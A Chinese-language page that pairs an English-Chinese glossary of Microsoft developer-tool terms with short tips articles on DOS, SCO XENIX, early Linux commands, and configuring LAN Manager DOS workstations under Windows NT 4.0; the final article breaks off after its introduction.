Resource DLL for the RC extension compiler for DESIGNINFO resources 用于 DESIGNINFO 资源的 RC 扩展编译器的资源 DLL
resource editor 资源编辑器
resource script 资源脚本
response 响应
response file 响应文件
restore 还原
result set 结果集
resulting value 结果值
resume 继续
Retail configuration “发布”配置
rethrow 再次引发
retrieve 检索
Return Return 键
return 返回
return code 返回代码
return type 返回类型
return value 返回值
revert to 恢复为
Revert to basis 还原为基本
revoke 撤消
rework 改编；返工
Rich edit control Rich Edit 控件
rich edit view Rich Edit 视图
rich HTML style Rich HTML 样式
rich text 多格式文本
rich text formatted RTF 格式
right outer join 右外部联接
root cause 根源
root object 根对象
Root Relative 与根相关的
rootkey 根项
round trip 往返行程
routine 例程
row pointer 行指针
row span 行跨距
row-major 行优先
rowset 行集合
RPC debugging RPC 调试
rule 规则
run a query 运行查询
run an application 运行应用程序
run code 运行代码
Run Length Encoded 行程编码 （Run Length Encoded）
run mode 运行模式
Run On 运行于
run out of process 进程外运行
run the example 运行示例
run time 运行时间
run-time behavior 运行时行为
run-time check 运行时检查
run-time class information 运行时类信息
run-time error 运行时错误
run-time instance 运行时实例
Run-Time Library Reference 运行时库参考
Run-Time-Only 仅用于运行时
salted hash Salted 哈希技术
sample 取样 (v.)；示例(n.)
sample code 示例代码
Sample Counter 样本计数器
satellite DLL 附属 DLL
Save as default 按默认值另存
Save file As file 另存为
scatter assembly 散点程序集
schedule 日程安排
schema 架构
Schema designer 架构设计器
schema rowset 架构行集合
scope 范围
scope pane 范围窗格
scope resolution 范围解析
Scribble application 随意画图应用程序
script 脚本
Script Debugger 脚本调试程序
scripting 脚本撰写
Scriptlet 脚本小程序
SDK debugger SDK 调试器
sealed class 密封类
search condition 搜索条件
secondary sort key 次要排序关键字
section 节（与程序段或文档内容相关时）；区域（与平面、位置相关时）
section name 节名（与程序段相关时）
security settings 安全设置
See also 请参见
selected 选定的
selection 选择
selector 选择器
self-contained 独立的
self-join 自联接
self-referenced 自引用的
Self-Relative 自相关（的）
semi-trusted 不完全受信任的
Send Behind 下移一层
separator 分隔符
Separator key 分隔符键
sequence 序列
serialize 串行化
server 服务器
server application 服务器应用程序
server counterpart 服务器副本
Server Explorer 服务器资源管理器
server-side component 服务器端组件
serviced component 服务组件
session object 会话对象
Sessionless 无会话
set a breakpoint 设置断点
set a flag 设置标志
set a property 设置属性
set a reference 设置引用
set accessor 设置访问器
set an index 设置索引
set an option 设置选项
set attributes 设置属性
Set operation Set 操作
set the cursor 设置游标
set to False 设置为假
set to True 设置为真
setting 设置
Setup 安装；设置
Setup Project 安装项目
Setup Toolkit 安装工具包
shadow copy 影像复制 (v.)；影像副本 (n.)
shallow copy 浅表副本；浅表复制（copy 作动词时）
shape control 形状控件
share 共享
shared checkout 以共享方式签出
sheet 纸
shell 外壳
shift the focus 变换焦点
short circuit operator 短路运算符
shortcut key combinations 快捷组合键
shortcut menu 快捷菜单
Show All 全部显示
Show Caller 显示调用方
Show full menus after a short delay 鼠标指针短暂停留后显示完整菜单
Show Hidden Members 显示隐藏成员
sibling 同辈
sign bit 符号位
sign file 签名文件
signaled state 终止状态
signed 有符号的
significand 有效数
simple binding 简单绑定
single tab stop 单个 Tab 停靠位
single-dimensional 一维
single-document interface (SDI) 单文档界面 (SDI)
Single-Inheritance 单一继承
single-precision floating point number 单精度浮点数字
single-threaded 单线程
sink 接收器
Size 大小；尺寸
size grip 大小手柄
SizeAll 四向箭头
sizing grip 大小调整手柄
skeleton application 主干应用程序
slash 斜杠
slider control 滑块控件
smart pointer 聪明指针
Snap to Grid 网格线对齐
snap-in 管理单元
snapshot 快照
snapshot-type recordset 快照类型记录集
socket 套接字
software publisher 软件发行者
Solution Explorer 解决方案资源管理器
solution file 解决方案文件
Solution Property Pages 解决方案属性页
Sort By 排序方式
source bitmap 源位图
source component 源组件
source control 源代码管理
source file 源文件
source window 源窗口
source-code control system 源代码管理系统
spacing 间距
specific location 指定位置
specific to 特定于；针对
specifier 说明符
spin button control 数值调节钮控件
spin control 数值调节钮控件
Split Vertical In 左右向中央缩进
splitter 拆分器
splitter window 拆分窗口
sponsor 发起人
spreadsheet 电子表格
SQL debugging SQL 调试
SQL pane “SQL”窗格
SQL pass-through SQL 传递
SQL Server injection attack SQL Server 注入式攻击
stack 堆栈
stack frame 堆栈帧
stack unwind 堆栈展开
stack walk 堆栈审核
stand-alone 独立
standalone application 独立应用程序
standard 标准
Standard Exe project 标准 EXE 项目
standard MFC AppWizard 标准 MFC 应用程序向导
Standard Template Library container adaptor 标准模板库容器适配器
starter application 起始应用程序
startup code 启动代码
startup form 启动窗体
startup shim 启动程序 (startup shim)
state 状态
state bag 状态袋
statement 语句
statement body 语句体
Statement Completion 语句结束
static control 静态控件
static member 静态成员
static method 静态方法
static modifier 静态修饰符
static splitter window 静态拆分窗口
static variable 静态变量
static-type 静态类型
status 状态
status bar control 状态栏控件
stencil 模具 (Stencil)
step a frame 通过一帧
Step By 调试方式
Step Into 逐语句；进入并单步执行；单步执行
Step Into Specific Function 进入并单步执行特定函数
Step Out 跳出
Step Over 逐过程
step through 逐句通过
step unit 单步执行单元
step-by-step 逐步骤
step-by-step details 详细步骤信息
step-by-step instructions 分步介绍
step-by-step procedure 逐步骤的过程
step-by-step procedures 详细步骤说明
step-by-step topics 分步指导的主题
stock 常用
stop 停止
storage class 存储类
storage object 存储对象
stored procedure 存储过程
straight quotation marks 直引号
stream 流式传输
stream socket 流式套接字
streamer 流转化器
stress test 压力测试
Stretch 拉伸
string 字符串
string expression 字符串表达式
string literal 字符串
string representation 字符串表示形式
string resource 字符串资源
string table 字符串表
string variable 字符串变量
stroke list 笔画列表
strong name 强名称
strongly typed Dataset 强类型数据集
strong-named 具有强名称的
struct type 结构类型
structure 结构
structure type 结构类型
stub 存根
style 样式
Style Builder 样式生成器
Style Organizer 样式组织程序
style sheet 样式表单
subclass 子类
sub-dependency 子依赖项
subkey 子项
submenu 子菜单
subscriber 订户
subscript expression 下标表达式
subsequent 后面的
subset 子集
subtree 子树
successful completion 成功完成
Summary 摘要
superclass 超类
superimposed outline 叠加的轮廓
support 支持
Surpress banner 取消显示版权标志
surrogate 代理项
symbol store 符号存储区
symbolic debugging information 符号调试信息
symmetric key 对称密钥
system catalog 系统目录
system registration database 系统注册数据库
system-defined 系统定义的
tab control 选项卡控件
Tab Order Tab 键顺序
Tabbed MDI 选项卡式 MDI
Table Designer 表设计器
table-structured object 表结构对象
table-type recordset 表类型记录集
target 目标
target computer 目标计算机
target machine 目标计算机
task 任务
task item 任务项
Task List 任务列表
tear-off interface 分开的接口
technical note 技术说明
Technology Preview 技术预览
Technology Preview release 技术预览版
Technote 技术说明
template 模板
template argument 模板参数
Template Library 模板库
template-based collection class 基于模板的集合类
templated class 模板类
Templated Control 模板化控件
terminating line number emission 显示终止行号
termination handler 终止处理程序
tertiary sort key 第三排序关键字
Test Container 测试容器
test project 测试项目
text box control 文本框控件
text mode 文本模式
text point 文本点
the alignment of the image 图像的对齐方式
the padding between each item 各项之间的边距
third-party 第三方
This feature will remain uninstalled 将不安装此功能
thread 线索
thread local storage 线程本地存储区
threaded marshaler 线程封送拆收器
threading 线程处理
threading model 线程模型
thread-safe 线程安全
three-button mouse 三键鼠标
threshold 阈值
throw an exception 引发异常
throw errors 引发错误
tick 刻度
tick mark 刻度线
tier 层
tightly coupled event 紧耦合事件
Time Critical 临界时间
time picker control 时间选择器控件
timer control 计时器控件
timer event 计时器事件
Tip 提示
to be supplied 待提供
to be written 待补
To Fit 合适大小
To learn more about 若要了解更多
token 令牌
tool 工具
tool tip 工具提示
toolbar 工具栏
toolbar button 工具栏按钮
toolbar control 工具栏控件
Toolbar editor 工具栏编辑器
Top margin 上边距
top-level 顶级
top-level window 顶级窗口
trace into 跟踪到
trace level 跟踪级别
trackbar 跟踪条
trail byte 尾字节
transaction 事务
transfer 传输
transient 瞬态
translate 翻译
translation unit 翻译单元
transmit buffer 传输缓冲区
Transparent floating toolbars 透明浮动工具栏
trappable 可捕获的
tree 树
tree control 树控件
Treeview 树视图
trigger 触发
tristate 三态
TRUE/true TRUE/真
truncate 截断
trusted 受信任（的）
try block Try 块
try-finally statement try-finally 语句
tutorial 教程
twip 缇
two-way 双向
type 字体
type bool bool 类型
type char char 类型
type checking 类型检查
type converter 类型转换器
type library 类型库
type long long 类型
type safety 类型安全
type specifier 类型说明符
type T T 类型
type ''type'' “type”类型
typed DataSet 类型化数据集
type-declaration character 类型声明字符
typelib 类型库
type-safe 类型安全
typographic 版式
UDDI UDDI
UI UI
unary operator 一元运算符
unattended execution 无人参与执行
unbox 取消装箱
uncheck 取消选中(v.)
undefine 取消定义
underlying 基础
undo action unit 撤消操作单元
undock 移除
unescaped newline 非转义换行符
Unexpected 意外的
Uninstall 卸载
union 并
union member 联合成员
union type 联合类型
unique 唯一
Universal Coordinated Time (UCT) 协调通用时间 (UCT)
unload 卸载
unlock 取消锁定
unmanaged class 非托管类
unmapped 未映射的
unmarshal 取消封送 (v.)
unnamed 未命名的
unpredictable results 不可预知的结果
unrestricted 无限制的
unsafe 不安全
unsafe code blocks 不安全代码块
unsigned 无符号（的）
unsized array 未确定大小的数组
unsupported 不受支持（的）
update region 更新区域
up-down control up-down 控件
upper bound 上限
upstream 上游
URI URI
urlencoded form data URL 编码窗体数据
user action 用户操作
user control 用户控制
user ID 用户 ID
user interaction 用户交互
User Interface Management 用户界面管理
user-defined 用户定义的
user-drawn 用户描述的
user-interface thread 用户界面线程
user-supplied 用户提供的
utility 实用工具
valid 有效的
valid value 有效值
Validate 验证
validator 验证程序
value-type 值类型
variable 变量
variable-length 变长
Variant Variant(作为变量类型时不翻译)；变量
VARIANT data type VARIANT 数据类型
Variant expression 变量表达式
VBA Add-In Object Model VBA 外接程序对象模型
Verify 验证；校验
versionable 无版本冲突的
vertical guideline 垂直准线
view 视图
view class 视图类
viewstate 视图状态
virtual 虚拟的
virtual function 虚函数
virtual method 虚方法
virtual root 虚拟根
Visual Basic .NET Standard Visual Basic .NET 标准版
Visual Basic ActiveX Control Visual Basic ActiveX 控件
Visual Basic application Visual Basic 应用程序
Visual Basic code Visual Basic 代码
Visual Basic Code Editor Visual Basic 代码编辑器
Visual Basic development environment Visual Basic 开发环境
Visual Basic Environment Visual Basic 环境
Visual Basic form Visual Basic 窗体
Visual Basic Language Reference Visual Basic 语言参考
Visual Basic programmer Visual Basic 程序员
Visual Basic run-time DLL Visual Basic 运行时 DLL 资源文件
Visual Basic Technical Assistance Forum Visual Basic 技术支持论坛
Visual Basic Technology Preview Visual Basic 技术预览
Visual Basic.NET Compiler Command-Line Interface Visual Basic.NET 编译器命令行接口
Visual C# .NET Standard Visual C# .NET 标准版
Visual C++ .NET Standard Visual C++ .NET 标准版
Visual C++ AutoResize Resource DLL Visual C++“自动调整大小”DLL 资源文件
Visual C++ Build System Package Resources Visual C++ 生成系统包资源
Visual C++ Directory Picker Control UI Visual C++ 目录选择器控件用户界面
Visual C++ IDE Visual C++ IDE
Visual C++ Resource Editor Package User Interface Visual C++ 资源编辑器软件包用户界面
Visual Database Tools 可视化数据库工具
Visual J# .NET Redistributable Package Visual J# .NET 可再发行组件包
visual modeling 可视化建模
Visual Studio .NET Academic Visual Studio .NET 学院版
Visual Studio .NET Enterprise Architect Visual Studio .NET 企业级结构设计版
Visual Studio .NET Enterprise Developer Visual Studio .NET 企业级开发版
Visual Studio .NET Professional Developer Visual Studio .NET 专业级开发版
Visual Studio debugger Visual Studio 调试器
Visual Studio Environment Menu Resource DLL Visual Studio 环境菜单资源 DLL
Visual Studio File Recovery Visual Studio 文件恢复
void pointer void 指针
VS .NET Prerequisites VS .NET 系统必备
VSEE Versioning Enlistment Manager Proxy VSEE 版本登记管理器代理
wait cursor 等待光标
warning 警告
Warning from CopyWeb 来自 CopyWeb 的警告
warning level 告警级别
watch expression 监视表达式
Watch window 监视窗口
Web Application Creation 创建 Web 应用程序
Web Application Walkthrough 演练 Web 应用程序
web farm web 场
Web Form Web 窗体
web garden 网络园
Web Publishing Wizard 站点发布向导
Web server Web 服务器
Web site Web 站点
Web-based 基于 Web 的
WebClass designer WebClass 设计器
WebControl Toolbox Web 控件工具箱
Web-crawling Web 爬行遍历
WebForms Designer Verb WebForms 设计器谓词
wedge button 三角形按钮
well-behaved 良性的
well-defined 定义完善的
Whitespace 空白
wide-character 宽字符
wide-character string 宽字符字符串
wide-character version 宽字符版本
widening conversion 扩大转换
widget 小部件
Win Form Win 窗体
Win Forms Designer Win 窗体设计器
window class 窗口类
window style 窗口样式
windowless 无窗口
windowless control 无窗口控件
windowpane 窗口窗格
Windows CE Application Frameworks Windows CE 应用程序框架集
Windows Common Controls Windows 公共控件
Windows Component Update Windows 组件更新
Windows Forms Windows 窗体
Windows Installer bootstrapper Windows 安装引导程序
Windows NT Embedded 嵌入式 Windows NT
Windows Scripting Host Windows 脚本宿主
Windows XP Embedded 嵌入式 Windows XP
Windows-based application 基于 Windows 的应用程序
wizard 向导
Wizard Manager 向导管理器
wizard-type 向导类型
worker thread 辅助线程
workspace object 工作区对象
World Wide Web Consortium (W3C) WWW 联合会 (W3C)
wrapped proxy 预包装代理
wrapper 包装
writer 编写器
X-Small 特小
XX-Small 超特小
zero-based 从零开始的
zero-length 零长度
zomby 僵停


SCO XENIX Ver2.3.4中两个有用的DOS拷贝命令

《一键清理系统垃圾》

SCO XENIX Ver2.3.4中两个有用的DOS拷贝命令

    在SCO XENIX Ver2. 3. 4操作系统中，大多数用户针对DOS 盘的拷贝一般都使用doscp命令，而fromdos和todos命令却很少被使用，在XENIX 操作系统的有关书籍资料中，也很少提及这两个命令。现针对这两个命令的使用方法简介如下：

    一、可修改XENIX操作系统中有关缺省DOS盘路径文件：/etc/default/msdos 文件，以便于对A、B软盘驱动器进行DOS操作。（不改也可以直接使用XENIX 格式的驱动器名）。

    使vi编辑器

    $vi/etc/default/msdos

    将msdos文件中如下两行：

    A=/dev/install

    B=/dev/install

    修改为：

    A=/dev/fd096ds15 (5.25寸软盘A驱动器)

    B=/dev/fd1135ds185 (3.5寸软盘B动器)

    或

    A=/dev/fd1135ds18 (3.5寸软盘A驱动器)

    B=/dev/fd096ds15 (5.25寸软盘B驱动器)

    二、fromdos命令：从DOS格式的软盘上拷贝多个文件到XENIX系统中 Usage:$fromdos disk:/dospath/directoy XENIX中径名或文件名 用法：$fromdos DOS格式盘路径名：XENIX格式路径名

    例如：$fromdos A:/tmp

    说明：将DOS格式软盘A上的文件全部拷贝到XENIX系统的/tmp目录下。

    优点：该命令功能强于doscp，可将DOS子目录下的文件拷贝到XENIX目录下， 还可以使用通配符“？”、“ *.*”，一次拷贝多个文件。 对回车换行自动转换处理。

    三、todos命令：从 XENIX系统中拷贝多个文件到DOS格式的软盘上 Usage:$todos file [file...] disk:/dospath/director

    用法：$todos XENIX文件名 DOS格式盘路径名：

    例如：$todos /usr/gz a:

    说明：将XENIX操作系统中的/usr/gz目录下的全部文件拷贝到DOS格式软盘A 上。

    优点：该命令功能基本和doscp命令功能相当，可将文件拷贝到DOS 盘的子目录下，还可以使用通配符“？”、“*.*”一次拷贝多个文件。 在拷贝过程中还将显示拷贝的文件名。

    （运行环境：DECpc LPx 450d2机型，SCO XENIX Ver2.3.4）

返回


在Windows 2000使用纯DOS的方法

《一键清理系统垃圾》

在Windows 2000使用纯DOS的方法

有一种非常巧妙的方法可以让Windows 2000安装后也能够进入纯DOS：在安装Windows 2000前先用Windows 98启动盘启动，并通过SYS C：命令向C盘传输系统，然后按常规方法安装Windows 2000，安装成功后即可在启动菜单中在默认的Microsoft Windows 2000菜单下会多出一个Microsoft Windows项目，选中此选项就会启动Windows，但由于我们并没有安装Windows 98，所以此时会出现我们需要的DOS窗口，而且绝对是正宗的实模式。


在Windows XP中运行DOS程序

《一键清理系统垃圾》

在Windows XP中运行DOS程序

    问：近日我将系统升级为Windows XP，但是我的一些旧的排版软件需要在DOS下运行，而Windows XP中已经没有纯DOS了，请问应该怎么运行DOS程序呢？

    答：可以采用start命令来运行。在Windows XP的命令提示符中输入：start/seperate要运行的程序，即可运行相应的DOS程序。其中参数separate的作用是在单独的内存空间启动16位程序，而用参数shared则是在共享的内存空间启动16位程序。当DOS程序运行后我们还可按“Alt+Enter”键在全屏幕与窗口之间进行切换。


从DOS启动TurboLinux

《一键清理系统垃圾》

从DOS启动TurboLinux

    我们都知道，安装Linux时会有两个启动选项：使用LILO或者从软盘启动，其实我们还可以从DOS启动。
    以我安装的TurboLinux 6.0中文版为例，在安装光盘的dosutils目录下有一个文件loadlin.exe，我们可以首先把loadlin.exe和dosutils\autoboot里的vmlinuz拷贝到C:\Linux目录，然后在此目录下制作一个linux.bat文件，文件内容如下：
    loadlin vmlinuz root=/dev/hdb2
    解释：vmlinuz是Linux的核心，root=/dev/hdb2表示我的Linux根目录在第二硬盘的第二分区，如果是第一硬盘的第一分区当然就应该是root=/dev/hda1了，其它的依此类推。
    运行Linux.bat，开始启动。启动时会显示很多乱码，进入X Windows后则不再出现乱码。其实我们只要把Linux.bat修改为如下内容就一切OK了：
    loadlin vmlinuz root=/dev/hdb2 vga=normal LANG=zh_CN.GBK
    LANGUAGE=zh_CN.GBK
    解释：因为从dosutils\autoboot目录下拷贝的vmlinuz并不是最新的核心，有很多新的功能它都不能支持，所以在启动Turbo Linux后应找到Linux分区下的同名文件替换它。


对照DOS学Linux的基本命令

《一键清理系统垃圾》

对照DOS学Linux的基本命令

    随着中文版的Linux的诞生，Linux这个诞生于网络，发展于网络的开放式操作系统已经步入我们的世界，它具有Unix系统的可靠性、稳定性、多任务性以及强大的网络功能，吸引了广大的电脑爱好者。为使大家能更好、更快地熟悉、深入到Linux系统中，现将Linux的基本操作与我们所熟悉的DOS操作中相似的命令加以比较，以进行基本命令的学习。
    一、基础知识
    1.开机进入
    Linux系统的开机同正常的DOS、Windows开关机顺序相同。若是多操作系统则在LILO boot：后输入Linux，就可进入Linux的注册提示符Login：，在其后输入用户名，在口令提示符password：后输入口令，注册正确后，可进入相应的用户环境。如输入：root，及其密码，可进入超级用户环境＃，输入其他用户名及口令，可进入该用户环境＄。
    2.关机退出
    在超级用户提示符＃下输入halt（立即关机）或shutdown　time（延迟time分后关机，给各用户每隔一段时间发出一个还有多长时间将关机的警告）后，计算机将进行一系列的关机工作，最后出现System halt（关机结束），就可以关闭电源了。非超级用户则需用exit退出操作环境，再进入超级用户环境，方可进行关机工作。
    3.操作注意事项
    在Linux中有一些与DOS不完全相同的地方，见^33020202a^表：
    在Linux系统中，超级用户的系统提示符是＃，一般情况下普通用户的系统提示符是S，通用户的系统提示符也同DOS一样可以进行更改；通配符中＊与?的含义与DOS中一样，[]是仅包括括号内的符号，连续的符号可用“－”连接首尾的符号代替，如[12345678]可以用[1－8]代替，[abcdefijk]可用[a－fi－k]表示。
    4.文件类型
    与DOS、Windows不同的是，在Linux系统中，目录和设备都被视为文件，共有四种类型的文件，它们是：①普通文件，在长列目录方式时行首用符号“－”表示。②目录文件，即我们通常所说的目录，在长列目录方式时行首用字母“d”表示。③字符设备文件，如显示器、打印机、终端等，在长列目录方式时行首用字母“c”表示。④块设备文件，如硬盘、软盘、光盘在长列目录方式时行首用字母“b”表示。
    在Linux中用长格式列目录命令ls －l时，显示如下：
    文件类型
    － rwxrw － r － －　5　user　group　1089　　nov 18 1998　 filename
    含义是：
    存取权 　　 用户 　　组名 　　字节数 　　最后修改时间 　　文件名
    大家对DOS下的8.3格式的文件名都一定很熟悉了，由于它的表达能力有限，所以在Windows95之后加入了长文件名支持，Linux继承了UNIX的优点，也可以用长字符串作文件名。但是在Linux中文件类型不像在DOS下那样容易从文件的扩展名上了解到，在DOS下的可执行文件的扩展名为com或exe，而在Linux中只能通过文件属性得知，采用命令ls －F可区分目录和文件，在目录后有“/”符号，可执行文件后有“＊”符号，用ls －aF可把所有的文件和目录列出，包括隐藏的文件和目录，隐藏文件的文件名以点号“.”开头。
    5.读取权限
    在Linux中，文件的主人即所有者，其他使用者分别称为同组者、其他人，为保证各用户文件的安全，Linux同UNIX一样通过限制某些用户对文件的随意存取。共有三个级别的存取权：读r、写w、执行x。在存取权中的字符顺序是：所有者、同组人、其他人。在上例中分别表示：主人对文件拥有读写权和执行权，同组人对文件拥有读写权、其他人对文件只拥有读权。
    二、文件管理和目录操作
    与DOS、Windows一样，在Linux中也有许多文件管理和目录操作方面的命令，对二者的主要命令列表如下：
    1.文件管理（^33020202b^）
    2.目录操作（^33020202c^）
    在二者中，命令的格式都是一样的，只是选项、参数不相同而已，也可以进行组合操作，且Linux的命令的功能更为强大，DOS中的不少命令都是借鉴UNIX而来的，而Linux正是基于UNIX发展起来的，这也是二者有着几乎相同的命令和格式的原因之一。
    三、软、硬盘及光驱的使用
    1.软、硬盘及光驱的使用
    在Linux中对其他硬盘逻辑分区、软盘，光盘的使用与我们通常在DOS与Windows中的使用方法是不一样的，不能直接访问，因为在Linux中它们都被视为文件，因此在访问使用前必须使用装载命令mount将它们装载到系统的/mnt目录中来，使用结束，必须进行卸载。命令格式如下：
    mount －t　文件类型 设备名 装载目录
    文件类型常用的有：
    msdos　　dos分区文件
    ext2　　　Linux的文件系统
    swap　　　Linux swap分区或swap文件
    iso9660　 CD－ROM的文件系统
    vfat　　　支持长文件名的dos分区
    hpfs　　　OS/2分区文件系统
    设备名是指要装载的设备的名称，如软盘、硬盘、光盘等，软盘一般为/dev/fd0 fd1，硬盘一般为/dev/hda hdb，硬盘逻辑分区一般为hda1 hda2…等等，光盘一般为/dev/hdc。在装载前一般要在/dev/mnt目录下建立一个空的目录，如软盘为floppy，硬盘分区为其盘符如c、d等等，光盘为cd－rom，使用命令：
    mount －t msdos /dev/fd0 /mnt/floppy
      装载一个mddos格式的软盘
    mount －t ext2 /dev/fd0 /mnt/floppy
      装载一个Linux格式的软盘
    mount －t vfat /dev/hda1 /mnt/c
      装载Windows98格式的硬盘分区
    mount －t iso9660 /dev/hdc /mnt/cd－rom
      装载一个光盘
    装载完成之后便可对该目录进行操作，在使用新的软盘及光盘前必须退出该目录，使用卸载命令进行卸载，方可使用新的软盘及光盘，否则系统不会承认该软盘的，光盘在卸载前是不能用光驱面板前的弹出键退出的。
    2.格式化命令mkfs
    格式化软盘时不需事先安装空盘，只需将软盘放入软驱中，使用如下命令，便可格式化一张在Linux中使用的软盘：
    ＃mkfs －t ext2 /dev/fd0 1440
    在熟悉以上基本命令之后，就可以进一步学习其他命令和软件，例如：文件编辑软件vi，存取权限的修改，检查修复文件系统，增减用户及修改密码，安装其他Linux文件，及一些Linux的实用工具软件，建立x－Windows图形界面，利用Linux上网等等，来增加对Linux的感性认识。


禁用指定DOS命令办法

《一键清理系统垃圾》

禁用指定DOS命令办法

    这种方法的基本原理是将危险的DOS命令加以限制，防止非法使用这些命令对硬盘数据进行破坏。具体方法如下：

    用“记事本”打开C盘根目录下的Autoexec文件，并在其中添加如下语句：

    C:\>DOSKEY FORMAT=Bad command or filename!

    C:\>DOSKEY del=Bad command or filename!

    C:\>DOSKEY deltree=Bad command or filename!

    然后存盘退出即可。这样再调用FORMAT、DEL、DELTREE等命令时，就会显示Bad command or filename而拒绝操作。如果在某种特殊情况下，你自己需要格式化硬盘，那该怎么办呢？你可以输入命令：C:\>DOSKEY FORMAT= (回车)，这样你就可以自由地对硬盘进行操作了。


快速安装中文Windows NT 4.0下的DOS工作站

《一键清理系统垃圾》

快速安装中文Windows NT 4.0下的DOS工作站

    目前，许多单位有大量的486微机仍在使用中，且有不少的DOS应用程序在使用，较难快速将工作站操作系统转换为Win95或Windows NT Workstation。因此为了一方面要保证网络操作系统能使用主流的Windows NT，另一方面又要兼顾现实的情况，就必须解决好Windows NT 4.0下DOS工作站的配置问题。
    本文详细介绍Windows NT 4.0下DOS工作站的配置方法及步骤。
    1.配置NT服务器：
    要想使用该网络工作站(当然，任意一个工作站，不论是DOS或是Win95或是Windows NT Workstation工作站均需完成下述操作)，首先必须在服务器上通过“开始→程序→管理工具→域用户管理器→用户→新用户”将你工作站的计算机名、用户名及所在域或组等有关信息添加到网络中。
    2.制作LAN Manager v2.0安装盘：
    方法1：可以在中文Windows NT Server 4.0服务器上通过“开始→程序→管理工具→网络客户管理器”，选择“制作安装磁盘组”中的“LAN Manager v2.0 for MS－DOS”进行制作。
    方法2：直接通过“资源管理器”进入“中文Windows NT Server 4.0”安装光盘，将“Client→Lanman→Disks”目录下的“Disk1”、“Disk2”、“Disk3”、“Disk4”子目录下的内容分别拷贝到四张1.44M软盘中即可。
    3.将LAN Manager v2.0安装到DOS工作站：
    步骤1：将“LAN Manager v2.0”安装盘的第一张磁盘插入磁盘驱动器中，并在该驱动器运行SETUP程序。当出现“Microsoft LAN Manager v2.0 SETUP”画面后按“Enter”键。
    步骤2：出现“Using the keyboard in setup”画面时按“Enter”键。
    步骤3：出现“Install LAN Manager”画面时，若认可安装是从“A：”驱动器进行，并且认可安装目标目录为“C:\LANMAN.DOS”时按“Enter”键。否则，用鼠标或通过“TAB”键将光标移到相应位置进行修改并按“Enter”键确认。
    步骤4：出现“Install LAN Manager”画面时，若认可安装是从“A：”驱动器进行，并且认可安装目标目录为“C:\LANMAN.DOS”时按“Enter”键。否则，用鼠标或通过“TAB”键将光标移到相应位置进行修改并按“Enter”键确认。
    步骤5：出现“Install LAN Manager”之“What do you want to install?”画面时，可直接按“Enter”键选择“LAN Manager Enhanced”安装方式。亦可选择“LAN Manager Basic”安装方式(该方式可节约内存，但它所提供的功能较少)。
    步骤6：出现“Insert Disk”之“DOS Drivers 1 in drive A”时将安装盘2换入软驱中，并按“Enter”键。
    步骤7：出现“Network Adapter Drivers”之画面时，请从“Select Available Network Adapter Driver”列表中选择合适网卡驱动程序。当列表中不包括网卡驱动程序时，按“Alt＋D”键使用“Other Driver”选项配置网卡，同时将包含网卡驱动程序的安装盘换入软驱中，并按“Enter”键。在“Other Network Adapter Drivers”画面中选定并确认网卡驱动程序。之后，在“Network Protocol for”画面中以光标加“空格”键选择网络通讯协议(一般采用Netbeui协议)以安装网卡驱动程序及网络通讯协议。
    步骤8：出现“Workstation Settings”之画面时，请在“Computername”选项中输入计算机名，在“Username”选项中输入用户名，在“Domain”中输入计算机所在主域域名，在“Other Domains to Monitor”中输入计算机所在其他域域名或工作组名称(此项可不输)。按“Enter”确认以上各选项有效。
    步骤9：出现“Support for Windows Environment”之画面时，请在“Run MS－DOS LAN Manager with the Windows Environment?”选项中用光标选择“Yes”或“No”以确定是否在MS－DOS及Windows中与网络连接。
    步骤10：当选中“Yes”确定是在MS－DOS及Windows中与网络连接时，请在出现“Windows Directory”画面中的“Windows Directory[]”选项填入Windows的路径。
    步骤11：在出现“Messaging Popups”画面的选项中选定你是否在Windows及MS－DOS环境下都能运行网络程序。同时在“Configuration Complete”画面保存以上配置。
    步骤12：在出现“Insert Disk DOS DRIVERS 2 in driver A：”画面时，换入“LAN Manager”的第三张盘继续安装至结束。
    至此，在CONFIG.SYS文件中会包含类似如下几行命令：
    DEVICE=C:\LANMAN.DOS\DRIVERS\DOSUTILS\EMM386.EXE NOEMS
    LASTDRIVE=Z
    DOS=HIGH，UMB
    DEVICE=C：\LANMAN.DOS\DRIVERS\PROTMAN\PROTMAN.DOS/i:
    C：\LANMAN.DOS
    DEVICE=C：\LANMAN.DOS\DRIVERS\ETHERNET\ELNK3\ELNK3.DOS
    (此以3C509网卡为例)
    在AUTOEXEC.BAT文件中会包含类似如下几行命令：
    SET PATH=C:\LANMAN.DOS\NETPROG；％PATH％
    NET START WORKSTATION
    LOAD NETBEUI
    [注]若每次开机均要求登录，在此行之下加：
    NET LOGON <USERNAME>＊
    4.配置LAN Manager v2.0的DOS工作站：
    在完成以上安装后重新启动DOS工作站，并记录下“Activating adapter at I/O Port=0x???，INT=xx”即网卡的I/O地址及中断号。然后，用“EDIT”或其他编辑器对“C:\LANMAN.DOS\PROTOCOL.INI”进行相应的修改。具体做法如下：
    在PROTOCOL.INI文件中[NETBEUI_XIF]组里的
    DRIVERNAME=ELNK3＄(此仍以3C509网卡为例)
    ;2nd driver name=ELNK32＄
    之下加上
    ;INTERRUPT=xx(xx为启动时所见到的中断号INT)
    ;IOADDRESS=0x???(0x???为启动时所见到的地址I/O Port)
    重新启动即可完成配置安装。
    当工作站是IBM300GL等自带以太网卡的原装PC机时：
    需要将PROTOCOL.INI文件[NETBEUI_XIF]组中
    BINDINGS=“XXXXXX”所指向的那个组中的
    ;Sample Protocol.INI
    [MS＄CRYSTAL]
    二行删除，并在
    DRIVERNAME=XXXXXXX
    之下加上
    ;INTERRUPT=xx(xx为启动时所见到的中断号INT)
    ;IOADDRESS=0x???(0x???为启动时所见到的地址I/O Port)
    重新启动即可完成配置安装。
    5.配置LAN Manager v2.0的网络命令：
    1NET
    运行网络连接程序
    2NET/?
    查看NET命令的用法
    3NET LOGON
    登录网络
    4NET LOGOFF
    注销网络
    5NET VIEW \\NTSERVER
    观察服务器NTSERVER中的共享资源
    6NET USE F： \\NTSERVER\WORK
    将网络驱动器F：连接到服务器NTSERVER中的共享资源，其共享名称为WORK
    7NET USE
    观察网络驱动器及网络打印机连接状况
    8NET USE F： /DELETE
    删除网络驱动器F：
    9NET USE LPTn: \\NTSERVER\HP－4VC
    将服务器NTSERVER上的HP－4VC作为网络共享打印机连接到本机的LPTn端口上
    10NET USE LPTn: \\NTSERVER\HP－4VC/PERSISTENT:NO
    更改网络打印机连接设置
    11 NET USE LPTn: /DELETE
    中断所连接的网络打印机

返回


快速调用DOS窗口的简便方法

《一键清理系统垃圾》

快速调用DOS窗口的简便方法

《中国电脑教育报》杭箴良

    《中国电脑教育报》今年第二期A23版上的文章《快速调用DOS窗口》介绍的快速调用DOS窗口的方法虽然可行，但这里还有更简便的方法：

